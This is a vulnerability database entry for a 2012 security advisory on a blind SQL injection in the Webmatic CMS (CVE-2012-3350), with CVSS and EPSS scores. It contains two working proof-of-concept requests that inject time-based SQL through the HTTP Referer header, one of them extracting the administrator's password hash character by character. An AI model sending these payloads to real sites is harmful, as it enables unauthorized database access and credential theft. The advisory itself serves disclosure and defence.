Lucene search

K
htbridgeHigh-Tech BridgeHTB23096
HistoryJun 13, 2012 - 12:00 a.m.

Blind SQL Injection in Webmatic

2012-06-1300:00:00
High-Tech Bridge
www.htbridge.com
11

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.197 Low

EPSS

Percentile

95.8%

High-Tech Bridge SA Security Research Lab has discovered vulnerability in Webmatic, which can be exploited to perform Blind SQL Injection attacks.

  1. Blind SQL Injection in Webmatic: CVE-2012-3350
    1.1 Input passed via the “Referer:” field of the HTTP header to index.php is not properly sanitised before being used in SQL query resulting in SQL injection. However the SQL injection is blind and shall be exploited by a time-based technique, or any other, suitable for blind SQL injection exploitation.
    The following PoC (Proof of Concept) verifies presence of the vulnerability, if SQL injection exists - web application response time will be longer than with a normal HTTP request:
    GET / HTTP/1.1
    Referer: 1’, IF((1=1),sleep(100),‘’), ‘’, ‘0’, ‘0’, ‘0’) – 2
    In the second PoC application response will be longer if the vulnerability is present and if the first character of administrator’s hash is equal to ‘a’:
    GET / HTTP/1.1
    Referer: 1’, IF(((SELECT mid(password,1,1) FROM _users WHERE userID=1)=‘a’),sleep(100),‘’), ‘’, ‘0’, ‘0’, ‘0’) – 2
    Successful exploitation of the vulnerability requires that “magic_quotes_gpc” is set to off.
CPENameOperatorVersion
webmatic le3.1.1

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.197 Low

EPSS

Percentile

95.8%